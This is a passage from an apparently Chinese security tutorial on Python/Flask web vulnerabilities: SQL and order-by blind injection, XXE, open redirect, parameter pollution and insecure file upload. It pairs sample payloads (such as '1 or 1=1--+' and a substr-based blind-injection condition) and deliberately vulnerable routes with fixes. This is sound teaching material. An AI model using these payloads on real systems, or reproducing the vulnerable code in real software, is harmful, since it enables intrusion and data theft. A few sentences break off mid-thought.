class="hljs-string">&quot;guess_success.html&quot;</span>, content=content)<br>                <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>                    abort(<span class="hljs-number">500</span>, description=<span class="hljs-string">f&quot;Error reading file: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>            <span class="hljs-keyword">else</span>:<br>                <span class="hljs-keyword">try</span>:<br>                    os.remove(path)<br>                    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;guess_unsuccess.html&quot;</span>)<br>                <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>                    abort(<span class="hljs-number">500</span>, description=<span class="hljs-string">f&quot;Error deleting file: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;guess.html&quot;</span>)<br></code></pre></td></tr></table></figure>



<h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><p>SQL注入是在输入的字符串之中注入SQL指令，在设计不良的程序当中忽略了字符检查，那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而执行。比如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">query = <span class="hljs-string">f&quot;SELECT * FROM users WHERE id = <span class="hljs-subst">&#123;user_id&#125;</span>;&quot;</span><br>query = <span class="hljs-string">f&quot;SELECT * FROM user WHERE id=&#x27;<span class="hljs-subst">&#123;user_id&#125;</span>&#x27;;&quot;</span><br></code></pre></td></tr></table></figure>

<p>这里我们令<code>id= 1 or 1=1--+/1&#39; or 1=1--+</code>，这个查询将会返回 <code>users</code> 表中的所有行，而不仅仅是<code>id </code>为1的行。</p>
<p>可以通过设置黑名单的方法来防止SQL注入，比如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python">SQL_BlackList=[<span class="hljs-string">&#x27;叉叉叉&#x27;</span>]<br><span class="hljs-comment">#-----------------------</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">is_blacklisted_SQL</span>(<span class="hljs-params">user_id</span>):<br>    <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> SQL_BlackList:<br>        <span class="hljs-keyword">if</span> item <span class="hljs-keyword">in</span> user_id:<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><span class="hljs-comment">#------------------------</span><br><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> user_id <span class="hljs-keyword">or</span> is_blacklisted_SQL(user_id):<br>    <span class="hljs-keyword">return</span> jsonify(&#123;<span class="hljs-string">&quot;error&quot;</span>: <span class="hljs-string">&quot;Invalid ID parameter&quot;</span>&#125;), <span class="hljs-number">400</span><br></code></pre></td></tr></table></figure>

<p>但设置黑名单并不是一个好方法，因为你永远不知道用户会构造出什么输入：</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10594">SQL注入绕过</a></p>
<p>对于字符型注入，不能只用转义符号去解决问题，比如但对于如下代码：</p>
<p>预编译是一种更好的方法：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> request<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/mysql&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sql_inject</span>():<br>    user_id = request.args.get(<span class="hljs-string">&#x27;id&#x27;</span>, <span class="hljs-number">2</span>)  <br>    conn = get_mysql_connection()<br>    <span class="hljs-keyword">if</span> conn <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Database connection failed&quot;</span>, <span class="hljs-number">500</span><br><br>    cursor = conn.cursor(dictionary=<span class="hljs-literal">True</span>)<br><br>    <span class="hljs-keyword">try</span>:<br>        query = <span class="hljs-string">&quot;SELECT * FROM user WHERE id = %s&quot;</span><br>        cursor.execute(query, (user_id,))<br>        user = cursor.fetchall()<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Error: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>        user = <span class="hljs-literal">None</span><br>    <span class="hljs-keyword">finally</span>:<br>        cursor.close()<br>        conn.close()<br><br>    <span class="hljs-keyword">return</span> user <span class="hljs-keyword">if</span> user <span class="hljs-keyword">else</span> <span class="hljs-string">&quot;User not found&quot;</span><br></code></pre></td></tr></table></figure>

<p>这里其实就是所谓的’参数化查询’，把用户的输入当成一个参数然后带入到构造好的SQL语句中，而不是像最开始一样把用户的部分输入也当成SQL语句执行，比如我们这时再输入<code>id= 1 or 1=1--+</code>,通过<code>print(f&quot;Executing query: &#123;query&#125; with user_id: &#123;user_id&#125;&quot;)</code>来获得执行的命令和<code>&#123;user_id&#125;</code>:</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">Executing query: <span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> %s <span class="hljs-keyword">with</span> user_id: <span class="hljs-number">1</span> <span class="hljs-keyword">or</span> <span class="hljs-number">1</span>=<span class="hljs-number">1</span><span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>

<p>但预编译是否就是无敌的呢？</p>
<p><a href="2247484349&idx=1&sn=93b4a4f9f89ccb235c918ef443e55547&chksm=c0cb7844f7bcf152c1b514f24fe23a6ae329ca6643717b4835082001ceb222611879243a9038&mpshare=1&scene=23&srcid=0927WYsPKlLXwkIrPg7OspFP&sharer_shareinfo=b34d1adb234c4eb65cd25dda1da7b8c9&sharer_shareinfo_first=b34d1adb234c4eb65cd25dda1da7b8c9#rd">预编译真的能完美防御SQL注入吗</a></p>
<p>我们把对应语句改为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">query = <span class="hljs-string">&quot;SELECT * FROM user ORDER BY %s&quot;</span><br>cursor.execute(query, (user_id,), multi=<span class="hljs-literal">True</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Executing query: <span class="hljs-subst">&#123;query&#125;</span> with user_id: <span class="hljs-subst">&#123;user_id&#125;</span>&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>通常在SQL注入防护中，参数化查询是关键方法之一。然而，参数化查询不能应用于SQL查询的所有部分，例如列名、表名或排序字段。这些部分如果直接使用用户输入，就有可能导致SQL注入。</p>
<p>这时不管输入什么，排序都不会变。因为本质上对无法预编译的参数(”字段名“)进行了预编译，从而发起不合法的请求(字段名不等于字符串)。但如果不用预编译的话，是否有比较好的防御方法呢？</p>
<p>可以通过间接对象引用解决：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> enum <span class="hljs-keyword">import</span> Enum<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">AllowedColumns</span>(<span class="hljs-title class_ inherited__">Enum</span>):<br>    ID = <span class="hljs-number">1</span>          <br>    NAME = <span class="hljs-number">2</span>             <br>    PASSWORD = <span class="hljs-number">3</span>    <br><br>allowed_columns = [column.name <span class="hljs-keyword">for</span> column <span class="hljs-keyword">in</span> AllowedColumns]<br><br><span class="hljs-keyword">try</span>:<br>    order_by_index = <span class="hljs-built_in">int</span>(order_by)<br>    <span class="hljs-keyword">if</span> order_by_index <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> [column.value <span class="hljs-keyword">for</span> column <span class="hljs-keyword">in</span> AllowedColumns]:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Invalid input&quot;</span>, <span class="hljs-number">400</span><br>    order_by = AllowedColumns(order_by_index).name<br><span class="hljs-keyword">except</span> ValueError:<br>    <span class="hljs-keyword">if</span> order_by <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> allowed_columns:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Invalid input&quot;</span>, <span class="hljs-number">400</span><br></code></pre></td></tr></table></figure>

<p>也可以直接写个白名单：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">try</span>:<br>   allowed_columns = [<span class="hljs-string">&#x27;id&#x27;</span>, <span class="hljs-string">&#x27;name&#x27;</span>, <span class="hljs-string">&#x27;email&#x27;</span>]  <br>   <span class="hljs-keyword">if</span> user_id <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> allowed_columns:<br>       <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Invalid column name&quot;</span>, <span class="hljs-number">400</span><br></code></pre></td></tr></table></figure>

<p>除了预编译，还一可以可以通过<code>ORM</code>来防止SQL注入:</p>
<blockquote>
<p>ORM（对象关系映射）是一种编程技术，它允许你通过使用面向对象的语法来操作关系数据库中的数据，而无需直接编写SQL查询语句。ORM工具将数据库表的行映射到程序中的对象，将数据库操作转化为对象操作，从而简化了数据持久化的过程。</p>
</blockquote>
<p>比如:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">User</span>(db.Model):<br>    __tablename__ = <span class="hljs-string">&quot;user&quot;</span><br>    <span class="hljs-built_in">id</span> = db.Column(db.Integer, primary_key=<span class="hljs-literal">True</span>, autoincrement=<span class="hljs-literal">True</span>)<br>    name = db.Column(db.String(<span class="hljs-number">100</span>), nullable=<span class="hljs-literal">False</span>)<br>    password = db.Column(db.String(<span class="hljs-number">100</span>), nullable=<span class="hljs-literal">False</span>)<br>    <br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/orm&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sql_in_orm</span>():<br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;GET&#x27;</span>:<br>        user_id = request.args.get(<span class="hljs-string">&#x27;id&#x27;</span>)<br>        users = User.query.filter_by(<span class="hljs-built_in">id</span> = user_id).<span class="hljs-built_in">all</span>()<br>        user_data = []<br>        <span class="hljs-keyword">for</span> user <span class="hljs-keyword">in</span> users:<br>            user_data.append(&#123;<br>                <span class="hljs-string">&#x27;id&#x27;</span>: user.<span class="hljs-built_in">id</span>,<br>                <span class="hljs-string">&#x27;name&#x27;</span>: user.name,<br>                <span class="hljs-string">&#x27;password&#x27;</span>: user.password<br>            &#125;)<br><br>        <span class="hljs-keyword">return</span> jsonify(user_data)<br></code></pre></td></tr></table></figure>

<p>可以看到不存在任何SQL语句，因为：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">users = <span class="hljs-keyword">User</span>.query.filter_by(id = user_id).<span class="hljs-keyword">all</span>()<br>相当于执行：<br><span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">User</span> <span class="hljs-keyword">WHERE</span> id = user_id;<br><br>users = <span class="hljs-keyword">User</span>.query.order_by(user_id).<span class="hljs-keyword">all</span>()<br>相当于执行：<br><span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">User</span> <span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> id<br>所以对于ORM，是不存在什么<span class="hljs-string">&#x27;不可预编译&#x27;</span>之类的问题<br></code></pre></td></tr></table></figure>



<p>也可以通过SQL注入进行文件读取，比如利用Mysql中的<code>LOAD_FILE</code>函数：</p>
<p><img src="/img/hmf_loadfile.png" srcset="/img/loading.gif" lazyload alt="hmf_loadfile"></p>
<p>但也不是想读就读，它对权限有要求。而且要看<code>secure_file_priv </code>是怎么设置的：</p>
<p><img src="/img/hmf_secure_file.png" srcset="/img/loading.gif" lazyload alt="hmf_secure_file"></p>
<p>当然，也可以通过<code>into outfile</code>去上传文件：</p>
<p><img src="/img/hmf_dunpinto.png" srcset="/img/loading.gif" lazyload alt="hmf_dunpinto"></p>
<h3 id="order-by-注入"><a href="#order-by-注入" class="headerlink" title="order by 注入"></a>order by 注入</h3><p>order by有如下特性：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs SQL">#id是<span class="hljs-keyword">user</span>表的第一列的列名，那么如果想根据id来排序：<br><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> id;<br><span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">1</span>;<br></code></pre></td></tr></table></figure>

<p>可以通过和<code>if</code>语句配合实现盲注：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">IF(<span class="hljs-keyword">condition</span>, true_value, false_value)<br>#这时可以让第三个参数的查询结果报错，通过状态码区分。比如：<br>IF(substr(database(), <span class="hljs-number">1</span>, <span class="hljs-number">1</span>) <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;a&#x27;</span>, <span class="hljs-number">1</span>, (<span class="hljs-keyword">SELECT</span> id <span class="hljs-keyword">FROM</span> information_schema.tables))<br></code></pre></td></tr></table></figure>

<p>方法其实有很多，参考:<a target="_blank" rel="noopener" href="https://blog.csdn.net/li20132273/article/details/127714511">orderby注入</a></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">注入原理介绍：<br><br><span class="hljs-number">1</span>、表达式为真，则页面正常显示，此时可操控表达式内容进行注入猜解<br><br><span class="hljs-number">2</span>、表达式为假，则页面输出告警（Something Wrong: Subquery <span class="hljs-keyword">returns</span> more than <span class="hljs-number">1</span> <span class="hljs-keyword">row</span>），其中SCHEMATA是Mysql自带数据库information_schema中存放所有库名的数据库，<span class="hljs-built_in">SCHEMA_NAME</span>为数据库名称<br></code></pre></td></tr></table></figure>













<h3 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h3><p>实体(Entity)不仅能用来存储指定数值，还能从本地文件&#x2F;远程网络中调用相关数据作为后续实体引用。当 XML 解析器处理这些外部实体时，如果没有适当的安全配置，攻击者可以利用这些外部实体来访问和泄露敏感信息或进行其他恶意操作。</p>
<p>Python 有三种方法解析 XML:</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-selector-id">#SAX</span><br>xml<span class="hljs-selector-class">.sax</span><span class="hljs-selector-class">.parse</span>()<br><br><span class="hljs-selector-id">#DOM</span><br>xml<span class="hljs-selector-class">.dom</span><span class="hljs-selector-class">.minidom</span><span class="hljs-selector-class">.parse</span>()<br>xml<span class="hljs-selector-class">.dom</span><span class="hljs-selector-class">.pulldom</span><span class="hljs-selector-class">.parse</span>()<br><br><span class="hljs-selector-id">#ElementTree</span><br>xml<span class="hljs-selector-class">.etree</span><span class="hljs-selector-class">.ElementTree</span>()<br></code></pre></td></tr></table></figure>

<p>前两个并不存在XXE。第三个虽然存在XXE但它默认不会解析和展开实体，除非对解析器进行如下设置：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">tree = lxml.objectify.parse(<span class="hljs-string">&#x27;xml.xml&#x27;</span>, etree.XMLParser(resolve_entities=<span class="hljs-literal">True</span>))<br></code></pre></td></tr></table></figure>

<p>注意这里<code>etree.XMLParser</code>虽然默认<code>resolve_entities=True)</code>：</p>
<p><img src="/img/hmf_8.png" srcset="/img/loading.gif" lazyload alt="hmf_8"></p>
<p>但从Python 3.7.1 开始，默认情况下不再处理外部通用实体。</p>
<p>所以要设置<code>etree.XMLParser(resolve_entities=True)</code>才能正常解析外部实体</p>
<p>最后，XXE不仅可以读文件，还可以：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/negnegil/article/details/118052676">XXE</a></p>
<h3 id="Open-Redirect"><a href="#Open-Redirect" class="headerlink" title="Open Redirect"></a>Open Redirect</h3><p>开放式重定向即从一个网站跳转到另一个网站，若未&#x2F;缺乏对目标URL的验证，可能会存在风险。</p>
<p>那为什么需要重定向呢？它可以优化用户体验、实现访问控制：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, redirect, url_for<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/old-page&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">old_page</span>():<br>    <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;new_page&#x27;</span>))<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/new-page&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">new_page</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;This is the New Page!&#x27;</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/login&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">login</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Please log in!&#x27;</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/profile&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">profile</span>():<br>    <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;login&#x27;</span>))<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(debug=<span class="hljs-literal">True</span>)<br><br></code></pre></td></tr></table></figure>

<p>Google:</p>
<p><img src="/img/hmf_or_1.png" srcset="/img/loading.gif" lazyload alt="hmf_or_1"></p>
<p>(注意跳转不是获取数据，所以不受同源策略限制)</p>
<p>Flask存在这么一个函数：<code>redirect</code>，可以用它进行URL跳转：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/redirect&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">urlbypass</span>():<br>    <span class="hljs-keyword">if</span> request.values.get(<span class="hljs-string">&#x27;url&#x27;</span>):<br>        url = request.values.get(<span class="hljs-string">&#x27;url&#x27;</span>)<br>        <span class="hljs-keyword">return</span> redirect(url)<br></code></pre></td></tr></table></figure>

<p>如果未对目标URL进行验证，可能会造成SSRF、账户劫持。</p>
<p>SSRF的话很简单，毕竟是往里填URL。账户劫持的话比如：</p>
<h3 id="HPP"><a href="#HPP" class="headerlink" title="HPP"></a>HPP</h3><p>在同一个请求发送不同值的同一个参数，会发生什么？</p>
<p>这完全取决于后端服务器，比如雅虎会返回最后查询的参数值，谷歌会返回两个连接的查询参数值。所以结果是：一些会返回第一个参数值，一些会返回最后一个参数值。还有一些网站会全部返回。</p>
<p>在Flask和Django中，通常在运行时会显式地创建一个字典用于存储请求参数或视图函数的参数：</p>
<h4 id="Flask"><a href="#Flask" class="headerlink" title="Flask"></a>Flask</h4><p>当请求参数有多个同名参数时，<code>request.args.get()</code> 方法会返回第一个值。例如，对于URL参数 <code>?name=John&amp;name=Alice</code>，调用 <code>request.args.get(&#39;name&#39;)</code> 会返回 <code>&quot;John&quot;</code>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    name = request.args.get(<span class="hljs-string">&#x27;name&#x27;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">f&#x27;The name is <span class="hljs-subst">&#123;name&#125;</span>&#x27;</span><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run()<br></code></pre></td></tr></table></figure>

<h4 id="Django"><a href="#Django" class="headerlink" title="Django"></a>Django</h4><p>当请求参数有多个同名参数时，<code>request.GET.get()</code> 方法会返回最后一个值。例如，对于URL参数 <code>?name=John&amp;name=Alice</code>，调用 <code>request.GET.get(&#39;name&#39;)</code> 会返回 <code>&quot;Alice&quot;</code>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> django.http <span class="hljs-keyword">import</span> HttpResponse<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>(<span class="hljs-params">request</span>):<br>    name = request.GET.get(<span class="hljs-string">&#x27;name&#x27;</span>)<br>    <span class="hljs-keyword">return</span> HttpResponse(<span class="hljs-string">f&#x27;The name is <span class="hljs-subst">&#123;name&#125;</span>&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>HPP对于预编译和ORM同样有效：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#预编译，http://127.0.0.1:2000/mysql?id=2&amp;id=3</span><br>query = <span class="hljs-string">&quot;SELECT * FROM user WHERE id = %s&quot;</span><br>        cursor.execute(query, (user_id,))<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Executing query: <span class="hljs-subst">&#123;query&#125;</span> with user_id: <span class="hljs-subst">&#123;user_id&#125;</span>&quot;</span>)<br><span class="hljs-comment">#会返回id=2的结果</span><br>Executing query: SELECT * FROM user WHERE <span class="hljs-built_in">id</span> = %s <span class="hljs-keyword">with</span> user_id: <span class="hljs-number">2</span><br><span class="hljs-comment">#ORM，http://127.0.0.1:2000/orm?id=2&amp;id=3</span><br><span class="hljs-comment">#返回id=2的结果</span><br></code></pre></td></tr></table></figure>

<p>那是否可以利用呢？比如对于如下情况：</p>
<p><img src="/img/HPP_1.png" srcset="/img/loading.gif" lazyload alt="HPP_1"></p>
<p>如果WAF检查第一个参数而Web app检查最后一个参数，这样就可能构造出一种简单的绕过方法：</p>
<p><img src="/img/HPP_2.png" srcset="/img/loading.gif" lazyload alt="HPP_2"></p>
<p>或者，若服务端会调用每个”用户给出的参数值“，则可以：</p>
<p><img src="/img/HPP_3.png" srcset="/img/loading.gif" lazyload alt="HPP_3"></p>
<p>对于Django，可以将某些参数进行覆盖：</p>
<p><code>session</code>从<code>cookie</code>中解码得到</p>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>以<code>flask</code>为例，给出一个上传文件的路由：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/upload&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>,<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>():<br>    <span class="hljs-keyword">if</span> request.files.get(<span class="hljs-string">&#x27;filename&#x27;</span>):<br>        file = request.files.get(<span class="hljs-string">&#x27;filename&#x27;</span>)<br>        upload_dir = os.path.join(os.path.dirname(__file__), <span class="hljs-string">&#x27;uploadfile&#x27;</span>)<br>        <span class="hljs-built_in">dir</span> = os.path.join(upload_dir, file.filename)<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-built_in">dir</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>            f.write(file.read())<br>        <span class="hljs-comment"># file.save(dir)</span><br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;upload.html&#x27;</span>, file=<span class="hljs-string">&#x27;上传成功&#x27;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;upload.html&#x27;</span>, file=<span class="hljs-string">&#x27;选择文件&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>它有什么问题呢？首先没有对文件名进行限制，会造成目录穿越。其次没有对后缀进行限制，会造成任意文件上传。还没有限制文件大小，可能会导致dos。对于任意文件上传，这里和我们常见的<code>php</code>不太一样。不管是<code>Flask</code>还是<code>Django</code>都需要路由进行请求，哪怕你上传了什么文件也没办法直接通过<code>http://xx/evil.xx</code>这种形式访问(除非能准确上传到<code>static</code>目录，但还是没卵用)。主要问题还是目录覆盖，比如<code>Flask</code>中将<code>app.py</code>进行覆盖，<code>Django</code>中将<code>__init__.py</code>进行覆盖。</p>
<p>对于限制文件名，还是利用<code>Flask</code>中自带的<code>secure_filename</code>函数进行修复。</p>
<p>对于文件大小，上传的类型中已经有特定的属性来获取</p>
